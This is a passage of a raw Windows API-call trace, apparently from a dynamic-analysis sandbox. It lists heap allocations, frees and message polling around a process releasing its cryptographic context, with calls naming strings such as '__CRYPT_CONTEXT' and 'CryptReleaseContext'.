dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0258.601] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0258.601] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.601] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0258.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0258.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.604] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0258.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0258.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0258.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0258.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0258.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.606] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0258.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0258.606] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0258.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0258.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.607] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0258.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0258.608] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0258.608] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0258.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0258.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0258.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0258.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0258.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0258.610] HeapFree (in: hHeap=0x970000, 